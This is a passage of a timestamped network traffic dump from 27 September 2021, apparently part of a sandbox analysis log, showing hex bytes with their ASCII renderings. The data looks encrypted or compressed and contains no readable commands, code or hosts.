c5 ea 77 16 e2 12 93 28 14 96 91 e0 22 d3 a5 41 a4 52 9b 84 a8 31 ff 08 ba f2 c2
                                      Data Ascii: [toZ-U'qD&kVJC9|0h/'#T#vgN-zB,/Pam2?AM|SukAB/u@#Y\}qUVx~}yZ3CaU*;C!`tO2NM-B(#`%DvOLUwS7w("AR1
                                      2021-09-27 11:24:29 UTC172INData Raw: 48 18 52 81 c2 cd 21 b9 af 4b 9e 2e 78 81 c1 c7 10 de fe 5a 66 ff e1 09 64 c4 7e 31 4c db fa 84 ad 59 6e c4 31 8c ad e6 c0 32 15 0e ba c5 92 d1 e7 60 2d 5c f0 cc a8 c3 13 9e 25 a0 58 22 02 b1 be 2a 9d 95 32 d7 a2 b2 8b a8 99 09 65 17 ed 30 17 91 fe 5e c8 68 83 75 4b 0c c8 4c 76 86 7b c9 44 cf 15 fd 31 5b 94 39 68 8a 9e a0 96 f8 de 89 32 3d 0e b7 40 0d 40 bc d4 14 ef f4 3b aa cc e0 31 b2 c8 ed 46 54 a4 54 b8 f8 d5 9e 3c 64 e4 b5 5c fd 9f ad b8 88 3e 64 0d c6 cd 83 b7 89 8b c9 cd 2d 14 ce c4 a1 87 bf 97 c2 37 59 3f 55 37 b1 66 fd 53 64 e3 ea 18 54 f4 37 fa 39 76 33 b2 a8 7a 60 dd 5f 39 47 06 44 fc e8 e2 e6 1c 31 0e 13 da 3f 0d e2 5e c5 c8 bd 70 0c d9 ca 9a b3 91 4a ff d2 ff 02 25 93 f3 3a bf 30 ea 46 ea 9d d1 7c 5f e1 7a 19 20 57 45 1d 7e da 6c c0 24 a6 97
                                      Data Ascii: HR!K.xZfd~1LYn12`-\%X"*2e0^huKLv{D1[9h2=@@;1FTT<d\>d-7Y?U7fSdT79v3z`_9GD1?^pJ%:0F|_z WE~l$
                                      2021-09-27 11:24:29 UTC173INData Raw: 93 d5 59 23 f5 fe 82 66 11 e1 44 cc c8 bf f8 4d 24 e2 db 36 52 ea 36 13 e0 5d 64 63 0b b6 59 14 96 0c e1 14 d2 55 46 8e 20 06 81 8d 40 ff a4 27 f3 58 cb 4a 51 e5 34 47 a5 f3 ea 0c f6 7b f2 f5 63 5b d0 fe 43 e1 b2 49 a5 f7 b6 ed a9 24 c5 65 7d 48 e2 6f dd 56 ac 96 4e 7d a1 80 0c 2d b7 54 2a 5a 39 bc 99 1a 1f ad de ef e8 63 c6 18 25 85 c3 a3 a1 99 81 ff 33 82 80 86 c8 6c 0e c6 e5 1d fc b3 73 78 9b aa 87 64 9d 6c 1a 24 3a 30 42 90 67 59 dc a7 17 7b a7 ac 08 14 06 59 d3 d6 26 33 2d f1 89 ba 59 20 15 d1 21 3d 59 f9 e5 4c d1 40 21 5e 96 0c 21 e1 27 58 0f d2 8b 6d 03 20 66 cc 46 56 69 44 0d 5a 9f c6 d6 30 be 27 27 c4 3a 35 87 39 37 59 ec 06 84 a2 92 1b 5a 95 81 d9 17 34 2a 6d 77 01 d5 79 32 ff 44 de 85 ff 22 8e 30 51 8e 18 a4 28 b0 78 dc ce 7a 4c 06 5c 5c 3b db
                                      Data Ascii: Y#fDM$6R6]dcYUF @'XJQ4G{c[CI$e}HoVN}-T*Z9c%3lsxdl$:0BgY{Y&3-Y !=YL@!^!'Xm fFViDZ0'':597YZ4*mwy2D"0Q(xzL\\;
                                      2021-09-27 11:24:29 UTC175INData Raw: 4c 0e 7f 38 3e 7f e3 c2 d7 9f cf 69 9a f3 b7 9a 43 74 4b 8d d3 3b 0a 72 e1 46 e8 94 4d ea 16 1a 84 cd 59 4c f7 2d ee 7e 13 68 60 7e 7e 8a c1 56 a7 44 4f 95 88 39 4b ba 0d 14 53 de 5b f0 85 09 89 1d de 24 29 f8 d4 54 c2 6b fb 3f 9c 52 9e fb 7a 66 ca b5 f3 92 ae 4a 6d 75 84 dc 21 50 dd 31 cb 2d d5 c7 c0 35 e6 b8 17 bb 5c 26 f8 1f 05 53 1d 81 26 fe 99 45 d6 05 a5 3d 51 ce aa 8c a2 ad 47 f0 15 42 05 03 ad a0 e8 ea ca 62 8b d4 59 da e0 1b 18 7c f6 1b f0 76 a0 2e fd 9b 77 e9 05 02 23 82 fb 4f 04 07 62 29 79 35 0a 7d 84 f9 01 f0 9b 6d db be 66 6b 67 c3 c6 d8 b2 2d 07 e7 2c b2 53 d0 57 26 36 4b 8d 10 d5 3e 41 1b 4e b5 9d 7a 28 08 6c a4 a2 00 53 6a 41 ff 1b fd e1 75 ee 20 af c4 68 7b 05 58 5c ec 7b dd a3 15 e4 48 80 7f 6a 82 50 c4 d2 7e ce 6e f1 0a b0 9e 3b 25 f6
                                      Data Ascii: L8>iCtK;rFMYL-~h`~~VDO9KS[$)Tk?RzfJmu!P1-5\&S&E=QGBbY|v.w#Ob)y5}mfkg-,SW&6K>ANz(lSjAu h{X\{HjP~n;%
                                      2021-09-27 11:24:29 UTC176INData Raw: c7 3f 37 70 3f 05 ea 95 da 8f dd 91 66 5a 8b 83 db 65 35 40 de 0e 99 99 06 31 82 44 e4 97 fd 50 8f a9 e2 f4 1e 30 54 b3 05 dc 98 7f 4e 74 5d ee 88 a1 50 d9 4e 7d a9 3e 40 a4 d8 f6 34 30 2e 12 c6 24 70 c1 3c af 5e 53 79 21 06 12 0a 5e 9d cf ee a7 9f 88 d6 4a 9f 39 f1 d2 d5 43 f6 45 e0 75 f8 90 08 15 fe ae 4b 9e b8 7e 78 fd 3f ec a2 ac bb 5e b8 e0 09 64 52 78 b7 c2 32 d6 f8 fe a5 1a 83 30 8c ad 70 c6 34 ad e7 20 bb c1 c6 9e 27 2c 5c f0 5a ae 73 8f 59 96 d9 0c 10 b7 f6 bf 2a 9d 03 34 9e 20 75 35 d1 cd 44 dc 50 ec 30 17 07 f8 b4 c5 92 c8 09 1e 64 3d 0b 77 86 7b 5f 42 6c 21 07 f3 26 c1 bd 91 cd 9f a0 96 6e d8 92 67 d5 24 d4 16 ad 75 f8 d5 14 ef 62 3d 29 88 08 1d d1 9e 51 7f 10 a5 54 b8 6e c4 bb 1b a7 60 c8 0b 25 2e 8d b8 88 3e f2 0b 2a fa 40 a6 f4 dc 3d 4c 65
                                      Data Ascii: ?7p?fZe5@1DP0TNt]PN}>@40.$p<^Sy!^J9CEuK~x?^dRx20p4 ',\ZsY*4 u5DP0d=w{_Bl!&ng$ub=)QTn`%.>*@=Le
                                      2021-09-27 11:24:29 UTC177INData Raw: bf 0a 59 61 9f 11 f8 a2 1d 50 17 41 e7 17 f7 42 56 2e b6 d2 27 77 66 06 25 5c d6 72 c7 bf 30 9c d9 fd f9 42 9f 53 b9 d2 25 d7 6c 83 0b c7 24 46 28 01 f9 3e d3 33 f8 19 0b f0 40 17 8f d7 c2 d1 ac 6a 9e 91 58 6e 44 2a fa 9b f3 cf e8 8b d1 ce b9 ca 4b d5 30 60 1f 49 54 5f 6c 5b f3 6f a9 28 c3 c2 71 83 66 11 77 55 bf e9 7c 7c 30 55 e3 67 b9 53 ea 36 85 f6 77 01 84 22 ef 28 37 86 80 e0 14 d2 c3 50 1b 51 e1 b2 d4 31 ba 18 ab f2 58 cb dc 47 b1 51 a0 e4 aa 98 6a 82 f6 f3 f5 63 cd c6 21 32 06 ee 10 d1 70 b2 7f a8 24 c5 f3 6b d3 88 88 ae 0f d8 3e 32 ef a0 80 0c bb b1 5d 5c bd bc e5 ec d0 bf 3f df ef e8 f5 c0 7f 4d 62 5b fa d7 72 7d 6d 32 82 80 10 c9 5f fd 26 7d 44 8b bf a2 eb 9a aa 87 f2 9b 4a f6 c4 ff 69 3a bd de c9 dd a7 17 ed a1 cb fb f4 17 24 aa 98 eb a5 2c f1
                                      Data Ascii: YaPABV.'wf%\r0BS%l$F(>3@jXnD*K0`IT_l[o(qfwU||0UgS6w"(7PQ1XGQjc!2p$k>2]\?Mb[r}m2_&}DJi:$,
                                      2021-09-27 11:24:29 UTC178INData Raw: 10 d6 44 20 0f 0e 1a 7c f5 13 a6 7f 27 2d 66 99 9e 13 14 14 21 82 f8 47 5f 0e d3 3d e2 37 d7 87 b7 ef 03 f0 98 65 f1 bd d7 68 fc c1 6f 22 e7 3b 05 e7 2f ba 01 d3 42 33 ad 49 10 ea a2 28 43 1b 4d bd 9c 59 43 0a f7 a6 cb fb ca 7c 43 ff 18 f5 d4 56 f6 36 34 c6 08 80 be 4e 5e ec 7d c5 29 30 ca 4c 1b 7d 2b 79 8a d2 d0 7e d8 6e 15 0b d2 a5 a0 27 7f 1f c1 b8 31 84 16 09 66 40 97 1a 31 2a b9 4a 77 f4 93 c5 61 46 bc fa a4 72 29 ab f5 37 8d d3 c8 f5 da 32 f6 1f e3 c1 b9 83 30 15 0f c3 2a 23 cd 73 15 66 ae f6 b3 d6 97 9a fd 5a 57 e2 77 bb c5 ea c2 10 10 5f 6b 62 84 85 2a 14 96 82 76 14 12 4c b6 8c 2f 07 75 be 33 ff 08 a9 64 58 d5 4e a1 e7 3b 46 00 c0 9a 0c 92 f4 65 f5 98 41 20 fc 4c e0 eb 75 d3 f7 a2 7d 3e 24 8d 61 8d 4a ed 6e 85 6a da 96 22 ed 36 80 c2 32 57 56 25
                                      Data Ascii: D |'-f!G_=7eho";/B3I(CMYC|CV64N^})0L}+y~n'1f@1*JwaFr)720*#sfZWw_kb*vL/u3dXN;FeA Lu}>$aJnj"62WV%
                                      2021-09-27 11:24:29 UTC179INData Raw: ac 9b 3a 0e 5e f0 cc ae 5d 8b 34 92 42 0e 5f b2 b5 9d 28 9d 95 34 49 01 e9 36 4a cf 74 d9 31 ce 32 17 91 f8 c0 c1 8b cc 92 1c 71 38 8c 55 84 7b c9 42 51 00 4d f0 bd c3 44 94 68 bd a2 96 f8 d8 17 62 06 21 4f 14 70 70 33 f7 16 ef f4 3d 34 ad 37 1e 4a 9c 90 7a f8 87 56 b8 f8 c4 10 1e 8d 65 53 09 80 2b 84 9b 8a 3e 64 0b 48 d1 f3 a6 6f de b4 49 4b 36 cc c4 a1 94 29 e5 39 b1 a1 6a 28 47 b3 44 ff 53 64 f2 7c 6a f2 40 d5 af 44 be 0f 90 aa 7a 60 ce c9 4b 6a a4 bc a9 95 2e 39 3e 33 0e 13 cb a9 7f 32 c0 27 9d c0 68 f6 fb c8 9a b3 80 dc 8d a7 2f fa 70 ee 47 ce 9c 32 ea 46 ec 13 cd a2 4e 07 2f 64 78 e1 67 1f 7e da 7d 56 56 7f 51 af 8f e9 1c 72 bd 72 14 ef 29 cc f0 a0 0a 69 07 bf 01 44 f0 ab 54 76 93 6c 3f 47 44 1e fa 60 76 87 91 8c 92 53 b3 fa 75 dd df c1 4a bc 14 8b
                                      Data Ascii: :^]4B_(4I6Jt12q8U{BQMDhb!Opp3=47JzVeS+>dHoIK6)9j(GDSd|j@Dz`Kj.9>32'h/pG2FN/dxg~}VVQrr)iDTvl?GD`vSuJ
                                      2021-09-27 11:24:29 UTC180INData Raw: f6 dc 5a cb 4a 47 73 46 ee e3 31 9a 71 92 74 dd f7 63 5b c6 68 31 1f dc 8b d3 8a a2 df 86 26 c5 65 6b de 90 bc a9 94 da eb 22 29 8e 82 0c 2d b1 c2 58 72 8f 7e ee 67 af db f1 ed e8 63 c0 8e 57 89 5f 61 d5 e4 6d 68 1d 80 80 86 c9 fa f9 3e 4e df 89 ce b3 c0 b5 a8 87 64 9b fa ed 15 fb f2 38 ed cf 80 f2 a5 17 7b a1 3a ff 95 27 bf a8 ab fa cb 03 f3 89 ba 5f b6 8a b1 2d fe 22 84 15 54 ff 42 21 5e 90 9a 53 01 39 9b 74 af 57 55 2d 22 66 cc 40 c0 1b 6f 3e 99 e4 bb c2 78 90 25 27 c4 3b a3 70 b1 03 9a 97 7b 8c c9 bc 19 5a 95 87 4f 65 48 41 ae 0c 7c 81 f3 03 fd 44 de 93 69 50 8d ae 92 f6 65 34 87 81 7a dc ce 7b da 74 f2 ef f8 a3 49 c3 ff 4f d6 3e 32 a0 4c f6 0c 37 5e 10 8b 20 ef f3 43 af d3 57 ed 21 da 13 7a 5c c3 d4 92 95 e0 88 7f 4e 0b 39 3e d5 a5 41 ef 41 bd 47 87
                                      Data Ascii: ZJGsF1qtc[h1&ek")-Xr~gcW_amh>Nd8{:'_-"TB!^S9tWU-"f@o>x%';p{ZOeHA|DiPe4z{tIO>2L7^ CW!z\N9>AAG
                                      2021-09-27 11:24:29 UTC182INData Raw: 54 a7 44 49 1b 94 01 49 7f 72 69 ef 83 60 f2 85 09 8f 93 c2 c5 7c 32 ab 29 76 5f c0 3d 9c 52 f8 6e 1d 3b f8 53 8c ef 53 5e 56 77 84 dc 27 de c1 fa 0f cb aa ba 74 19 dd ba 17 bb 5a a8 e4 50 32 b5 62 fc 06 2b a3 47 d6 05 a6 a3 6b dc e6 6b dd d0 13 5a 2f 40 05 03 ae 3e af 06 2d 84 f4 a9 39 51 da 19 18 7c f5 85 30 36 ec c9 82 e6 e3 81 3f 00 23 82 f8 d1 c9 9f 8f cf 06 48 aa 34 be fb 01 f0 98 f3 67 ce 2a 8c 18 be 12 f6 88 2f 07 e7 2f 2c 97 0b a7 c0 49 36 6d 1f ef 3c 41 1b 4d 2b 0a f2 64 ef 13 d9 b6 ec 6e 68 41 ff 18 63 42 54 1f c6 d0 b9 75 b9 38 5a 5c ec 7d 53 bf e5 99 a9 ff 02 56 23 6d c6 d2 7e d8 f8 83 27 f6 54 44 58 02 64 00 ac 33 84 16 9f f0 50 11 ff d5 55 c4 d7 54 e1 91 c5 61 d0 2a ed a9 83 cd d4 88 89 f0 c6 ca f5 da a4 60 25 4f 24 5d fc 4d f5 51 d6 28 23
                                      Data Ascii: TDIIri`|2)v_=Rn;SS^Vw'tZP2b+GkkZ/@>-9Q|06?#H4g*//,I6m<AM+dnhAcBTu8Z\}SV#m~'TDXd3PUTa*`%O$]MQ(#
                                      2021-09-27 11:24:29 UTC183INData Raw: ee 1e 37 34 62 ab 99 d6 43 32 7c 9c f4 34 30 b8 84 f6 84 81 25 43 d2 d3 a9 3d 23 06 12 9c c8 be 3f 0b 43 e0 f5 7f 6e da 3b f1 d2 43 d5 92 5b 1f 91 87 ed cd 53 bb ac 4b 9e 2e e8 89 f7 dd 08 dd d1 5a 3e fd e2 09 64 c4 ee 39 68 ce 32 87 83 59 9b c6 32 8c ad e6 50 3a b3 05 c4 c4 bc d1 3c 62 2e 5c f0 cc 38 cb fb a4 72 a6 71 22 7b b3 bd 2a 9d 95 a2 df 72 97 d1 ae b0 09 32 15 ee 30 17 91 6e 56 19 54 2c 76 63 0c 35 41 75 86 7b c9 d4 c7 9d e5 17 59 bc 39 ba 87 9d a0 96 f8 4e 81 42 12 c0 ab 6b 0d 20 b2 d7 14 ef f4 ab a2 6a ea f9 ae e3 ed 0b 5a a7 54 b8 f8 52 86 4e 60 84 b7 76 fd b9 c7 ba 88 3e 64 9d de 20 a2 42 8b a1 c9 fd 2f 17 ce c4 a1 02 bf 88 e7 5e 45 15 55 91 b5 65 fd 53 64 64 ea 48 50 a4 31 d0 39 49 37 b1 a8 7a 60 58 5f af 61 56 58 d6 e8 36 e2 1f 31 0e 13 5d
                                      Data Ascii: 74bC2|40%C=#?Cn;C[SK.Z>d9h2Y2P:<b.\8rq"{*r20nVT,vc5Au{Y9NBk jZTRN`v>d B/^EUeSddHP19I7z`X_aVX61]
                                      2021-09-27 11:24:29 UTC184INData Raw: d0 25 42 14 da ac 4e 84 1d 5a f2 40 17 19 41 28 0c 48 8e e1 ec c5 4d 15 28 fa 9b 65 59 a9 e3 23 2a c6 b7 f5 97 61 62 1f 49 c2 c9 81 bf 17 8b d6 55 23 a2 20 81 66 11 e1 c3 d4 71 8e 98 4f 28 e2 e7 e8 51 ea 36 13 60 5d 0a 61 c6 90 55 14 27 d1 e2 14 d2 55 c6 8e ae 12 56 ab 4c ff db fa f0 58 cb 4a d1 e5 16 45 00 d5 e5 0c 67 a7 f1 f5 63 5b 50 fe cd f6 0a 6f ac f7 b4 29 aa 24 c5 65 fd 48 ea 6d 4a 70 a5 96 15 b9 a2 80 0c 2d 27 54 61 4c 58 9a 91 1a f6 69 dd ef e8 63 56 18 f3 87 bf 85 aa 99 17 3b 30 82 80 86 5f 6c 5e d7 99 3b f6 b3 2f bd 98 aa 87 64 0d 6c 03 21 1b 16 47 90 71 9f df a7 17 7b 37 ac e2 0b f3 5b d7 d6 1a f3 2e f1 89 ba c9 20 92 d4 cd 1a 5d f9 17 8f d2 40 21 5e 06 0c e2 fa eb 7f 0b d2 73 af 00 20 66 cc d6 56 59 41 d9 7d 9b c6 87 fd bd 27 27 c4 ad 35 fd
                                      Data Ascii: %BNZ@A(HM(eY#*abIU# fqO(Q6`]aU'UVLXJEgc[Po)$eHmJp-'TaLXicV;0_l^;/dl!Gq{7[. ]@!^s fVYA}''5
                                      2021-09-27 11:24:29 UTC185INData Raw: 9c 4f 81 17 b3 c4 e3 cb bd e5 c3 b8 d1 68 80 73 1b 65 80 53 00 ad e8 6a 55 42 a5 ad 62 bf 99 b1 d5 7a e6 91 5d 4b 46 b0 cc ab 47 28 4d 1f 4c 0e bb 94 3d 7f e3 c2 57 9f 23 69 a4 da b7 9a 79 df 48 8d d3 3b 8a 72 b0 40 fe bd 4d ea ad b3 87 cd 59 4c 77 2d c9 79 ff 46 60 7e d6 1d c2 56 a7 44 df 8d cd 1b 8e 9b 0d 14 c1 49 58 f0 85 09 19 05 80 03 9e d6 d4 54 26 f3 f8 3f 9c 52 6e f8 07 7f 3f b7 f3 92 21 d3 6e 75 84 dc b1 48 b8 16 ed 2f d5 c7 e0 77 e4 b8 17 bb cb 26 c6 1f 90 53 1d 81 06 04 99 45 25 25 a4 35 6a c3 e3 8d cf bd 12 0a 14 42 15 13 af a8 af e7 1a 72 f5 d4 39 20 f1 0b 1c 7c f5 13 30 5f e9 2f 80 9b e3 33 06 02 23 82 f9 67 c8 0e a2 29 05 15 a8 87 85 f9 11 e0 9a 65 67 bd 2c 4a 18 c3 12 22 b3 0d 03 e7 2f ba 95 d3 94 26 4b 4b 6c ca d0 3e 41 1b 4f 9d 0e 59 61
                                      Data Ascii: OhseSjUBbz]KFG(ML=W#iyH;r@MYLw-yF`~VDIXT&?Rn?!nuH/w&SE%%5jBr9 |0_/3#g)eg,J"/&KKl>AOYa
                                      2021-09-27 11:24:29 UTC187INData Raw: b4 2c 90 88 b7 44 2a 89 b1 2a ed 02 b4 16 b3 d1 c8 3e d8 90 7d 52 fc 28 6e 76 b3 56 89 17 79 65 4d 41 57 0b 1b 3c fe e7 20 e9 cc bc ae 26 06 1f 7c 71 ae 04 da 9e 6c 8f 82 92 9b 4a 11 84 18 64 5c 68 c3 0d 98 80 b9 1b 6e 47 47 92 7b 43 71 a8 ed f5 f9 1b 2a b2 e1 dd 12 57 b2 75 c4 ef 7a 88 ac c0 31 7e 58 37 f2 a0 43 f7 2a 1e 78 12 6f 21 c3 d3 dc ac 02 56 4e 3e 4f 13 3d 5f 52 cd ab a6 53 89 63 6b 34 3a 40 d3 0a 4a db 40 df 76 e2 80 de 11 5d af 34 88 ea 7d 68 e3 c5 cb 17 af 3b 5b 4f c2 da 67 6d 79 37 ce 0c d7 64 ff 94 0e 61 33 bd ac a0 d0 dc 8e c8 22 da ee 25 98 24 2e 40 d5 df ae c2 89 a3 b1 64 0c 23 b0 08 b3 63 9c 9c 36 cf 2c 9d 33 b5 cf 0d fc 46 e8 11 15 07 d6 4c c5 5d c8 14 0d 2c 3c 28 75 ab 4b ec 46 c6 02 58 c2 72 c5 00 96 1e 88 8d 92 69 d9 27 69 01 22 e8
                                      Data Ascii: ,D**>}R(nvVyeMAW< &|qlJd\hnGG{Cq*Wuz1~X7C*xo!VN>O=_RSck4:@J@v]4}h;[Ogmy7da3"%$.@d#c6,3FL],<(uKFXri'i"
                                      2021-09-27 11:24:29 UTC188INData Raw: ab 23 18 d0 9e cc 5f a0 35 21 89 ae 2e 85 09 2a db 92 e9 67 5e 1d 53 10 4f 12 52 a9 12 0d 4e 2f c9 82 9a 96 b7 4a dc 6d ac de 37 45 9e 7e f6 00 40 65 15 34 18 b2 ca 56 7a 57 63 12 d4 46 4a 0b 9c d6 55 74 a2 17 fb 56 c5 79 d9 9a 23 9c 76 f9 63 73 6a 51 8d d6 ec ea d2 87 5a c3 2a 43 99 06 4e 38 f8 39 48 1c 58 f4 ef 03 ca dd 79 c0 7b 4d 39 9b ac 65 34 3d 1a 91 24 cb b5 ad 24 cc 95 ce 67 e8 8e 64 8e 48 e0 4c 8b 46 24 6c 33 24 f8 cf 42 82 e7 30 dd 5e 7d ea db 77 72 5e f3 76 b8 7f 2f 33 72 f7 17 19 2a 2b e3 2c 94 a5 62 e9 98 d2 49 75 9d 52 1e b4 b5 14 ec 08 88 f6 44 ee 59 47 d4 42 98 f5 f9 99 80 92 d1 fb 35 68 ea c6 2c 31 00 e7 64 d5 72 91 9a a3 0d c4 e7 65 50 9c 47 ad c1 ff 86 29 6c a4 9c 29 ed b1 d5 5c 31 a8 5c ef 23 ad 3c ed 48 e0 d2 c1 04 72 44 59 c6 d6 18
                                      Data Ascii: #_5!.*g^SORN/Jm7E~@e4VzWcFJUtVy#vcsjQZ*CN89HXy{M9e4=$$gdHLF$l3$B0^}wr^v/3r*+,bIuRDYGB5h,1drePG)l)\1\#<HrDY
                                      2021-09-27 11:24:29 UTC189INData Raw: d6 bf b3 d9 40 91 4c 88 ff 0d d0 57 ef 24 04 91 f9 53 05 56 7b 6e 6f 0a ef 27 af 85 0a cf f8 ee b7 fb 58 5b dd 1c 56 d5 a6 a3 ce f1 d4 9a d3 33 da a9 08 16 8c fa c9 31 fc f4 39 a3 b1 cb 67 ab 62 ed 5f 1a 27 53 44 f8 7b a8 30 40 33 b4 d7 f3 17 8c 44 88 4e 7e 8a d8 d5 a7 d6 88 7d ce 4d 66 67 cf 59 a6 90 be 97 c2 58 46 e9 53 5b d8 74 fd 3a 60 74 fd f0 4e 13 37 9c 1c 92 6a 3a ae e3 6c 87 5e da 40 ac 7f 6b e8 bf ad 84 3d 47 12 3a 3f 65 eb 6c da 06 bb 74 67 cb ca 03 b5 25 68 40 c8 a2 1a 85 80 93 03 16 36 59 5d e7 99 7c 5f 50 c4 dc 1b d1 1f d6 0e 6f c6 2c c4 bd b4 6a 48 9c 92 cc 4f d7 6c 45 eb a3 68 41 81 58 8b 94 c7 b0 7c 6d af 48 53 c7 e6 1e 9d 4e dd 38 1d 57 d8 38 a5 b7 57 7a 6a cb 8a f4 24 69 c0 c8 2d 3f b5 e6 75 cb c0 a2 0a 42 5a c4 c2 e1 14 f2 66 9d 23 17
                                      Data Ascii: @LW$SV{no'X[V319gb_'SD{0@3DN~}MfgYXFS[t:`tN7j:l^@k=G:?eltg%h@6Y]|_Po,jHOlEhAX|mHSN8W8Wzj$i-?uBZf#
                                      2021-09-27 11:24:29 UTC191INData Raw: e8 ff 38 e4 86 42 18 df f6 7c b4 01 05 6e 27 49 b5 66 2e 75 d1 92 5a fd 7d a8 50 2c 94 5c da 5c e2 99 53 34 81 3c 83 ee 98 79 41 1e 0b 85 45 a2 c4 99 54 6c ff a9 1b af f0 6f 93 d6 51 38 b2 b0 18 fa 39 83 db 65 9f 49 2a 25 99 15 ac be 5f cb b9 a6 3a 4b 84 a8 fe 16 8f 71 8e d7 83 a3 be c3 35 be 6e 24 9a c6 cb 12 41 f8 37 c9 cb 6a 90 5e 87 17 5e e2 0c 75 f6 c2 6b d0 d3 20 15 d9 09 57 ca 45 23 5a 26 c6 43 a9 53 28 79 c7 62 34 02 2f 5a 56 8c 0e 90 1e 80 1b 7b 9d 9b fc 76 35 0c 49 0a 24 46 e7 5f fe d2 f0 03 ff 41 8e d1 6c 81 1e 25 b3 bc 54 19 cb 17 4d 59 6d cb 1a c0 36 cc a2 95 d6 4f 37 d0 c0 81 1f e1 ba 97 c5 68 ba ea 49 b3 f6 97 7b 55 07 60 9d be bf a0 09 d7 e3 29 78 3a 9c 4b f0 4f 44 22 92 05 34 f8 a9 a9 c5 0d d9 36 48 df 26 62 ac f1 d9 a7 d7 b0 7f 9a ba ee
                                      Data Ascii: 8B|n'If.uZ}P,\\S4<yAETloQ89eI*%_:Kq5n$A7j^^uk WE#Z&CS(yb4/ZV{v5I$F_Al%TMYm6O7hI{U`)x:KOD"46H&b
                                      2021-09-27 11:24:29 UTC192INData Raw: 01 01 6b d4 b4 54 96 93 d1 3f d9 52 1b f8 9e 76 9c b5 8e 93 78 b3 29 75 84 dd 34 48 dc 14 2b 2c bb c7 69 17 c6 b9 3c bb 1f 3e a4 3b 3d 53 25 81 46 05 8b 45 cb 05 c6 34 78 c3 fe 8d bf ac 38 0a 51 42 85 02 85 a8 ea e7 aa 63 dd d4 7c 20 21 1a 33 7c b0 13 f0 7e fa 2f 9d 9b 03 12 2f 02 66 82 f8 45 da 0e bf 29 04 37 81 87 c0 f9 22 f2 43 6e 22 bd 0f 69 01 c1 57 22 72 2e ec e7 35 b8 76 d0 7c 26 63 49 8e ee 0f 35 04 1b 8e b8 a1 4b 24 09 b8 a3 c5 ec 51 68 88 f8 6b e2 41 54 c7 27 a1 d3 76 82 0d 50 2f fb 7e c7 fc 3a 1f 4f b8 7f 72 75 9a d6 97 7e 18 79 90 06 82 b2 c6 17 a1 0d f2 8e 93 b6 b5 1b 2b 60 18 19 9a 20 d5 4a 3f eb 82 c5 01 4e 3f fa fb 6d d6 a9 7d 3f d7 c4 32 fd c5 32 98 17 68 c2 41 88 62 15 3a dc 19 23 9a 7b b0 66 46 e9 62 d4 f4 93 47 4d 4b eb 4c bb 4d e3 0b
                                      Data Ascii: kT?Rvx)u4H+,i<>;=S%FE4x8QBc| !3|~//fE)7"Cn"iW"r.5v|&cI5K$QhkAT'vP/~:Oru~y+` J?N?m}?22hAb:#{fFbGMKLM
                                      2021-09-27 11:24:29 UTC193INData Raw: 94 c3 47 af d4 57 79 21 01 12 95 5e bc d4 07 a5 e9 88 7d 4e 89 39 fc d2 42 43 87 41 0b 77 87 90 db 11 f3 ae 4a 9e 39 7e 86 e2 db ee a2 ac 4b 5a b8 e0 77 64 d7 78 38 c6 ab d4 96 fe 5b 1e 9f 31 99 ad e7 c6 25 8d 14 22 c4 c1 f1 9a 32 2c 5d f0 ed af dc 8b bd 94 86 0d 3b b2 f5 bf 09 9c 8c 34 dd 01 b7 36 b7 cd 08 d9 77 ed 2b 17 93 f8 70 c0 69 ca 75 1e 2b 39 14 77 84 7b e1 43 d8 00 e0 f1 72 c0 26 94 cd 9f 8a 97 d9 d8 80 62 18 27 88 16 0f 70 d4 d4 37 ef f5 3d 8d ac cd 1f ae 9e dd 7b 37 a5 55 b8 c9 c5 a3 1e 43 62 87 0a da 2b 8e b8 bb 3f 43 0b dc d1 92 a5 a0 dc c8 49 52 14 e7 c4 a3 94 89 e4 e8 b8 46 68 62 46 d6 67 ff 53 5c f3 c7 6a 54 42 0a ac 14 be 7d b3 92 7b 4f ce 5e 4b 7d b1 75 ab ea 2e 97 1c 00 0e 12 cb 02 7e d2 c2 c3 9f 83 69 71 d8 cb 9a 8c 81 79 8d d1 3b 5c
                                      Data Ascii: GWy!^}N9BCAwJ9~KZwdx8[1%"2,];46w+piu+9w{Cr&b'p7={7UCb+?CIRFhbFgS\jTB}{O^K}u.~iqy;\
                                      2021-09-27 11:24:29 UTC194INData Raw: 8c 31 41 3f 47 7f 2c 02 bd 3b d7 18 e1 91 b3 d9 11 36 7c 4b 37 01 f9 e3 9c ff 09 de d3 fb ff 8f f0 74 b0 01 46 b2 c1 61 ba d7 34 55 28 44 be 1e 98 2d a9 a8 0e d4 46 32 df da a5 35 da b9 e3 f7 7d 90 4d 47 e5 d4 0d 7c 40 01 7d 9b ee b9 05 0f 8f ea b9 75 0b 96 2a e1 f5 53 3a 80 0f 15 e9 91 38 d9 a7 e8 6a 5f 4c 3a a2 9d 10 cd e6 ca c3 41 27 a1 6c 17 74 e4 43 19 86 f4 ef a6 f9 7d 8e a4 9a a4 1c ce 13 12 97 28 89 ef f1 fa f8 09 2c 5d d5 cc 19 eb 89 bf d4 a5 2b 22 49 ef ba 2a d9 94 53 df 34 9f 36 ac 8e 08 b2 52 ae 31 16 91 bb 57 ac 74 29 71 1f 0c 38 08 0e 86 46 f8 40 c7 00 e0 8a 5b be 09 96 cf d9 a1 eb f8 7b 97 60 33 26 a8 69 0d e9 ea d7 14 ef f5 bc a2 1c dc 1d ac 9e ec f9 12 bb 73 bf f8 c4 87 9b 41 e4 84 0c fd 68 8e 3f 88 dc 63 09 de 92 a7 2d 89 31 e6 4a 67 56
                                      Data Ascii: 1A?G,;6|K7tFa4U(D-F25}MG|@}u*S:8j_L:A'ltC}(,]+"I*S46R1Wt)q8F@[{`3&isAh?c-1JgV
                                      2021-09-27 11:24:29 UTC195INData Raw: 3e 59 2c 4d 24 a4 e4 9e 33 0e 14 b6 76 81 73 60 2e 74 bd 91 3c ee 70 69 6a ec 2f a0 de 54 d5 21 89 4e 60 79 05 ab 9b 10 ac 5f b5 0b 8f ff 07 66 51 57 7d 9c 06 b2 16 6e 95 34 48 4c 83 6e fc 4a 54 ae fe a1 14 2a 4f c4 9b 27 8e a9 cb 76 cc 80 8b f5 9f 73 60 59 08 c2 18 c0 4d 5d 2c d4 49 62 cd 11 c2 66 72 a0 55 b0 ab 9a 39 28 21 af 18 df 26 86 53 55 9f 31 73 2c 41 ff 4d 55 96 e4 a1 14 b5 14 50 e6 13 07 f7 cc 45 a9 67 c5 87 35 ae 03 29 83 29 34 8b b6 ec 65 fd 9a b2 f5 21 19 c6 bd 73 e0 a8 2f d1 b2 e0 7d ee 66 c5 22 29 48 d8 2c ac 13 9a 96 40 af a0 e3 4e 2d d5 16 58 3e fc 98 8a 58 af 5a 9d ef 80 21 